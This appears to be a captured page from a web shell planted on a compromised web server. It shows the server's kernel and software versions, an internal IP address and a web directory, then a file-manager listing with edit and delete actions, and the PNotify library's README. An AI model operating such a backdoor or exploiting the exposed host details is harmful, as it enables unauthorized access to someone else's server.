MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux ip-172-26-15-81 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
  SOFT : Apache/2.4.41 (Ubuntu) PHP : 7.4.3-4ubuntu2.29
/var/www/studentcon/manage/vendors/pnotify/
172.26.15.81

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
dist dir drwxr-xr-x 2018-08-01 01:23 R D
libtests dir drwxr-xr-x 2018-08-01 01:23 R D
.bower.json 1.078 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
.gitignore 0.09 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
COPYING 11.092 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
README.md 13.621 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
bower.json 0.752 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
REQUEST EXIT
[![Stories in Ready](https://badge.waffle.io/sciactive/pnotify.png?label=ready&title=Ready)](http://waffle.io/sciactive/pnotify) [![Stories in Progress](https://badge.waffle.io/sciactive/pnotify.png?label=in progress&title=In Progress)](http://waffle.io/sciactive/pnotify) PNotify is a JavaScript notification plugin, developed by SciActive. PNotify can also provide [desktop notifications](http://sciactive.com/pnotify/#web-notifications) based on the [Web Notifications spec](http://www.w3.org/TR/notifications/). If desktop notifications are not available or not allowed, PNotify will fall back to displaying the notice as a regular, in-browser notice. Demos ===== http://sciactive.com/pnotify/ Requirements ============ jQuery (1.6 or higher) Getting Started =============== You can include PNotify using Bower, NPM, or a custom download. PNotify custom download comes with the following files: * `pnotify.custom.js` & `pnotify.custom.min.js` (Minified) * `pnotify.custom.css` & `pnotify.custom.min.css` (Minified) So here's how you'd include them on your page: ```html ``` Now you can use PNotify like this: ```html ``` If you are not using any UI library, you can use the included styling, called Bright Theme. It is the default. If you are using Bootstrap version 2, include this line somewhere before your first notice: ```js PNotify.prototype.options.styling = "bootstrap2"; ``` If you are using Bootstrap v